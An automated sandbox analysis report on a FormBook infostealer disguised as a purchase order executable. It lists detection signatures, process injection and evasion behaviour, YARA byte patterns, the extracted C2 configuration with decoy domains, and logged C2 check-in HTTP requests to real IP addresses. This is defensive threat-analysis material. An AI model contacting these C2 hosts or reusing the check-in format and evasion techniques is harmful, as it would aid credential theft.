Windows Analysis Report
Purchase Order#23113.exe

Overview

General Information

Sample name:Purchase Order#23113.exe
Analysis ID:1422056
MD5:fa3e92f061246f3b1625e6f8b8291836
SHA1:a58763445fe7359a7b0a527ec1dc00ecdc7337f0
SHA256:ca1d2592c9726d9e3a6a57c55ac57b40d9aa3bc501393a40962afd5bd4946433
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Purchase Order#23113.exe (PID: 6564 cmdline: "C:\Users\user\Desktop\Purchase Order#23113.exe" MD5: FA3E92F061246F3B1625E6F8B8291836)
    • Purchase Order#23113.exe (PID: 6636 cmdline: "C:\Users\user\Desktop\Purchase Order#23113.exe" MD5: FA3E92F061246F3B1625E6F8B8291836)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • cscript.exe (PID: 1068 cmdline: "C:\Windows\SysWOW64\cscript.exe" MD5: CB601B41D4C8074BE8A84AED564A94DC)
          • cmd.exe (PID: 6324 cmdline: /c del "C:\Users\user\Desktop\Purchase Order#23113.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 list": ["www.yoursweets.online/vr01/"], "decoy": ["eclipsefoodservice.com", "oregonjobs.co", "ethicai.pro", "frontierconnects.co", "elcaporalburley.com", "exoticskinco.com", "topdeals.biz", "carmensbookstore.com", "mayorii.com", "viewhird.com", "bharatcrimecontrol24news.com", "sampleshubusa.com", "molobeverello.com", "nicholsonflooringservices.com", "kidscircle.shop", "771010.cc", "poseidoncrm.com", "liviafiorelli.com", "flavorfog.online", "xaqh.info", "bombslot-42.co", "floatshop.store", "massagechairspecialists.com", "mks-digital.net", "wti395.vip", "entelnegocio.com", "ansemgram.com", "owletbaby.shop", "skyhut.io", "kakevpn.com", "protectmichildren.net", "gratiasempirellc.com", "hsyxkj.com", "kirtirefrigeration.com", "makeyousurprise.com", "qqixe.shop", "svshop.us", "yesxoit.xyz", "jupitr-claim.top", "laneflowlogistics.com", "brandonbirk.com", "vjll.net", "maturak-na-klic.online", "mingshengglass.com", "theshopsatmaunalani.com", "accidentapp.online", "fertnow.com", "nicolbauer.com", "mym-agency.com", "efxprm.com", "studioenginedemo.com", "erabits.com", "chhpiyg.pro", "adadripdropz.com", "dropperdeals.com", "viphao200.com", "lasik-eye-surgery-45089.bond", "helyibudapest.com", "michellecaldwelldesign.com", "snugandkind.com", "redirect2-userweb.com", "pataltarghya.com", "tumi123ans.lol", "familyofficesheet.com"]}
Source | Rule | Description | Author | Strings
00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      • 0x18849:$sqlite3step: 68 34 1C 7B E1
      • 0x1895c:$sqlite3step: 68 34 1C 7B E1
      • 0x18878:$sqlite3text: 68 38 2A 90 C5
      • 0x1899d:$sqlite3text: 68 38 2A 90 C5
      • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
      Source | Rule | Description | Author | Strings
      2.2.Purchase Order#23113.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      2.2.Purchase Order#23113.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
      2.2.Purchase Order#23113.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
          • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          2.2.Purchase Order#23113.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          2.2.Purchase Order#23113.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
          • 0x18849:$sqlite3step: 68 34 1C 7B E1
          • 0x1895c:$sqlite3step: 68 34 1C 7B E1
          • 0x18878:$sqlite3text: 68 38 2A 90 C5
          • 0x1899d:$sqlite3text: 68 38 2A 90 C5
          • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
          No Sigma rule has matched
          Timestamp: 04/08/24-10:06:49.944631 | SID: 2031412 | Source Port: 49750 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
          Timestamp: 04/08/24-10:06:29.007960 | SID: 2031412 | Source Port: 49749 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
          Timestamp: 04/08/24-10:03:45.371301 | SID: 2031412 | Source Port: 49744 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
          Timestamp: 04/08/24-10:04:46.028484 | SID: 2031412 | Source Port: 49746 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
          Timestamp: 04/08/24-10:07:11.266292 | SID: 2031412 | Source Port: 49751 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
          Timestamp: 04/08/24-10:04:25.566585 | SID: 2031412 | Source Port: 49745 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
          Timestamp: 04/08/24-10:05:47.854456 | SID: 2031412 | Source Port: 49748 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
          Timestamp: 04/08/24-10:05:27.536502 | SID: 2031412 | Source Port: 49747 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected
          Timestamp: 04/08/24-10:03:25.123202 | SID: 2031412 | Source Port: 49742 | Destination Port: 80 | Protocol: TCP | Classtype: A Network Trojan was detected

          AV Detection

          Source: http://www.yoursweets.online | Avira URL Cloud: Label: malware
          Source: http://www.yoursweets.online/vr01/www.massagechairspecialists.com | Avira URL Cloud: Label: malware
          Source: www.yoursweets.online/vr01/ | Avira URL Cloud: Label: malware
          Source: http://www.yoursweets.online/vr01/ | Avira URL Cloud: Label: malware
          Source: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.yoursweets.online/vr01/"], "decoy": ["eclipsefoodservice.com", "oregonjobs.co", "ethicai.pro", "frontierconnects.co", "elcaporalburley.com", "exoticskinco.com", "topdeals.biz", "carmensbookstore.com", "mayorii.com", "viewhird.com", "bharatcrimecontrol24news.com", "sampleshubusa.com", "molobeverello.com", "nicholsonflooringservices.com", "kidscircle.shop", "771010.cc", "poseidoncrm.com", "liviafiorelli.com", "flavorfog.online", "xaqh.info", "bombslot-42.co", "floatshop.store", "massagechairspecialists.com", "mks-digital.net", "wti395.vip", "entelnegocio.com", "ansemgram.com", "owletbaby.shop", "skyhut.io", "kakevpn.com", "protectmichildren.net", "gratiasempirellc.com", "hsyxkj.com", "kirtirefrigeration.com", "makeyousurprise.com", "qqixe.shop", "svshop.us", "yesxoit.xyz", "jupitr-claim.top", "laneflowlogistics.com", "brandonbirk.com", "vjll.net", "maturak-na-klic.online", "mingshengglass.com", "theshopsatmaunalani.com", "accidentapp.online", "fertnow.com", "nicolbauer.com", "mym-agency.com", "efxprm.com", "studioenginedemo.com", "erabits.com", "chhpiyg.pro", "adadripdropz.com", "dropperdeals.com", "viphao200.com", "lasik-eye-surgery-45089.bond", "helyibudapest.com", "michellecaldwelldesign.com", "snugandkind.com", "redirect2-userweb.com", "pataltarghya.com", "tumi123ans.lol", "familyofficesheet.com"]}
          Source: Purchase Order#23113.exe | ReversingLabs: Detection: 31%
          Source: Purchase Order#23113.exe | Virustotal: Detection: 39%
          Source: Yara match | File source: 2.2.Purchase Order#23113.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.Purchase Order#23113.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0.2.Purchase Order#23113.exe.40c9970.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000004.00000002.4199706438.0000000002DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.4200202747.0000000004C40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.4200153899.0000000004C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.1818257514.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.1771916843.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Purchase Order#23113.exe | Joe Sandbox ML: detected
          Source: Purchase Order#23113.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: Purchase Order#23113.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: cscript.pdbUGP source: Purchase Order#23113.exe, 00000002.00000002.1819119178.00000000012A8000.00000004.00000020.00020000.00000000.sdmp, Purchase Order#23113.exe, 00000002.00000002.1819543047.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, cscript.exe, 00000004.00000002.4199582828.0000000000700000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: eGGj.pdb source: Purchase Order#23113.exe
          Source: Binary string: eGGj.pdbSHA256 source: Purchase Order#23113.exe
          Source: Binary string: wntdll.pdbUGP source: Purchase Order#23113.exe, 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.1818306118.0000000004B6B000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.1821000587.0000000004D1D000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Purchase Order#23113.exe, Purchase Order#23113.exe, 00000002.00000002.1819753451.0000000001700000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, cscript.exe, 00000004.00000003.1818306118.0000000004B6B000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.1821000587.0000000004D1D000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.4200449914.0000000004ED0000.00000040.00001000.00020000.00000000.sdmp, cscript.exe, 00000004.00000002.4200449914.000000000506E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: cscript.pdb source: Purchase Order#23113.exe, 00000002.00000002.1819119178.00000000012A8000.00000004.00000020.00020000.00000000.sdmp, Purchase Order#23113.exe, 00000002.00000002.1819543047.00000000016D0000.00000040.10000000.00040000.00000000.sdmp, cscript.exe, cscript.exe, 00000004.00000002.4199582828.0000000000700000.00000040.80000000.00040000.00000000.sdmp
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 4_2_00712674 GetFileAttributesW,GetLastError,FindFirstFileW,WideCharToMultiByte,GetLastError,__alloca_probe_16,WideCharToMultiByte,GetFileAttributesA,GetLastError,FindFirstFileA,FindClose, 4_2_00712674
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe | Code function: 4x nop then jmp 07FB8D85h, 0_2_07FB8AA5
          Source: C:\Users\user\Desktop\Purchase Order#23113.exe | Code function: 4x nop then jmp 07FB8D85h, 0_2_07FB881E

          Networking

          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49742 -> 172.67.165.166:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49744 -> 102.134.40.151:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49745 -> 23.227.38.74:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49746 -> 198.185.159.144:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49747 -> 66.235.200.146:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49748 -> 13.248.169.48:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49749 -> 45.76.63.192:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49750 -> 66.147.240.91:80
          Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49751 -> 45.88.201.15:80
          Source: C:\Windows\explorer.exe | Network Connect: 13.248.169.48 80
          Source: C:\Windows\explorer.exe | Network Connect: 102.134.40.151 80
          Source: C:\Windows\explorer.exe | Network Connect: 45.76.63.192 80
          Source: C:\Windows\explorer.exe | Network Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exe | Network Connect: 172.67.165.166 80
          Source: C:\Windows\explorer.exe | Network Connect: 66.147.240.91 80
          Source: C:\Windows\explorer.exe | Network Connect: 66.235.200.146 80
          Source: C:\Windows\explorer.exe | Network Connect: 198.185.159.144 80
          Source: Malware configuration extractor | URLs: www.yoursweets.online/vr01/
          Source: global traffic | HTTP traffic detected: GET /vr01/?Vr=L4nHMf5x&YN9P-lUP=IPhgDyoL8PETBIlA+LipHiQIJ5tdYs8vDEe7V5bx7imqp8ZSB+vz7lbDvtba/1SpkLzf HTTP/1.1 | Host: www.xaqh.info | Connection: close | Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /vr01/?YN9P-lUP=p/xcNqyzh27Txsj3CquMV/rjlfuack/vmC9Eop/11cDYDFLPNTQG2lepFRnhiYBgsx3b&Vr=L4nHMf5x HTTP/1.1 | Host: www.mingshengglass.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /vr01/?YN9P-lUP=S/bPAjqIKQKwHrqZpy8n8RiCdt73FJpF/P8H7i/MmAA1ELfbDMBmDqe40tCi9lxWreLB&Vr=L4nHMf5x HTTP/1.1 | Host: www.massagechairspecialists.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /vr01/?Vr=L4nHMf5x&YN9P-lUP=fg5rWdIOm16VAcpULIi6VqF28GIEm83UbJ9UUTJ5CcfameYBqVWF6xiHMvk1uSJgUfvX HTTP/1.1 | Host: www.mks-digital.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /vr01/?Vr=L4nHMf5x&YN9P-lUP=GUL62cbCCJOJReCemxk1O8Otc3kXCElGSolYG/8Ig6Cn2Nx69M0sY0/cN1gdp8glXS6z HTTP/1.1 | Host: www.snugandkind.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /vr01/?YN9P-lUP=om+RAj9K10xplgkf4U8b3M9JRGUJ2euP6f07OPQVfzk2A/ET/uqRAGThuSpikjnaupQL&Vr=L4nHMf5x HTTP/1.1 | Host: www.owletbaby.shop | Connection: close | Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /vr01/?YN9P-lUP=9c9cKs9OosrhOa63FDxOZSQTlUYWLUzvl6rD164QiuJtlecCGMWXkWvi90D7WwOzyhmU&Vr=L4nHMf5x HTTP/1.1 | Host: www.studioenginedemo.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /vr01/?Vr=L4nHMf5x&YN9P-lUP=wFZ5enEBtK4n2aaiRnhfStMJiblJh5bHmGRWjDpakqkf/10aPf5zMfbio25A5myUwmpi HTTP/1.1 | Host: www.oregonjobs.co | Connection: close | Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox View | IP Address: 66.235.200.146
          Source: Joe Sandbox View | IP Address: 13.248.169.48
          Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
          Source: Joe Sandbox View | ASN Name: AMAZON-02US
          Source: Joe Sandbox View | ASN Name: sun-asnSC
          Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\explorer.exe | Code function: 3_2_0E63EF82 getaddrinfo,setsockopt,recv, 3_2_0E63EF82
          Source: unknown | DNS traffic detected: queries for: www.xaqh.info
          Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Mon, 08 Apr 2024 08:04:25 GMT | Content-Type: text/html; charset=UTF-8 | Content-Length: 4518 | Connection: close | X-Frame-Options: SAMEORIGIN | Referrer-Policy: same-origin | Cache-Control: max-age=15 | Expires: Mon, 08 Apr 2024 08:04:40 GMT | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wANL7iq3n8fB6IVRAeYwRGh3sIo3VeJH9A%2F9X5RFh%2BF5wEjXy8HwdWZHaJonMe%2BesMkpMRkY4I4hP%2F17Mbxycb2CIz1YJ63HVLOQazvBus2LQ3%2Br4eGUcfnpnWWgzX8dahcqg3PacsXGW40pfKWENZg%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} | Server-Timing: cfRequestDuration;dur=8.000135 | X-XSS-Protection: 1; mode=block | X-Content-Type-Options: nosniff | X-Permitted-Cross-Domain-Policies: none | X-Download-Options: noopen | Server: cloudflare | CF-RAY: 8710bf1c2b697425-MIA | alt-svc: h3=":443"; ma=86400
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 08 Apr 2024 08:06:50 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1
          Source: explorer.exe, 00000003.00000000.1775351799.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1778244869.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4203553690.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105954537.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106322421.0000000009836000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4205763772.0000000009837000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: Purchase Order#23113.exe | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
          Source: Purchase Order#23113.exe | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
          Source: explorer.exe, 00000003.00000000.1775351799.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1778244869.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4203553690.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105954537.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106322421.0000000009836000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4205763772.0000000009837000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000003.00000000.1775351799.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1778244869.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4203553690.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105954537.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106322421.0000000009836000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4205763772.0000000009837000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: Purchase Order#23113.exe | String found in binary or memory: http://ocsp.comodoca.com0
          Source: explorer.exe, 00000003.00000000.1775351799.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1778244869.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4203553690.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105954537.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3106322421.0000000009836000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4205763772.0000000009837000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000003.00000002.4202743547.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1775351799.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000003.00000000.1779124228.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1776990412.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1776251589.0000000007F40000.00000002.00000001.00040000.00000000.sdmp | String found in binary or memory: http://schemas.micro
          Source: Purchase Order#23113.exe | String found in binary or memory: http://tempuri.org/DataSet1.xsdAAsistencias.Properties.Resources
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000003.3105954537.00000000079B5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4202743547.00000000079B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1775351799.00000000079B1000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.brandonbirk.com
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.brandonbirk.com/vr01/
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.brandonbirk.com/vr01/www.snugandkind.com
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.brandonbirk.comReferer:
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.entelnegocio.com
          Source: explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.entelnegocio.com/vr01/
          Source: explorer.exe, 00000003.00000002.4209675788.000000000CA91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105465010.000000000CA91000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.entelnegocio.comReferer:
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: Purchase Order#23113.exe, 00000000.00000002.1773800584.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
